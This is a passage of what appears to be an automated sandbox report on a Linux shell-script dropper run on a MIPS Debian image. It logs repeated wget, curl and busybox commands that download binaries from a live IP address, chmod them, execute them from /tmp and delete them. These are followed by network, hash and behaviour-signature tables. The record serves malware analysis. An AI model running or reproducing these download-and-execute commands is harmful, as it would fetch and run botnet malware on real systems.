[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/chmod

[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc

[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/rm

[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/wget

[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/chmod

[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx

[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/rm

[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/wget

[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/chmod

[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH

[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/rm

[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/wget

[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/chmod

[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3

[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/rm

[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/wget

[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/chmod

[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk

[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/rm

[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/wget

[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/chmod

[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO

[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/rm

[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/wget

[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/chmod

[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV

[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/rm

[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/wget

[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/chmod

[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi

[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/rm

[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/wget

[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/chmod

[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM

[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/rm

[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/wget

[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/chmod

[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV

[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/rm

[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/wget

[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/chmod

[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi

[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/rm

[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/wget

[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/chmod

[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM

[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/rm

[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/wget

[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/chmod

[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO

[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/rm

[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/wget

[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/chmod

[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/rm

[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/wget

[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/chmod

[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e

[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/rm

[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/wget

[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/chmod

[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc

[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/rm

[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/wget

[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/chmod

[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ

[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/rm

[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/chmod

[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy

[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/rm

[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/wget

[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/chmod

[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH

[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/rm

[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/wget

[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/chmod

[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3

[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/rm

[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/wget

[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/chmod

[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk

[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/rm

[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/wget

[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/chmod

[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc

[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/rm

[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/wget

[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/chmod

[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx

[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/rm

[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:02

Platform

debian9-mipsel-20240418-en

Max time kernel

55s

Max time network

57s

Command Line

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A
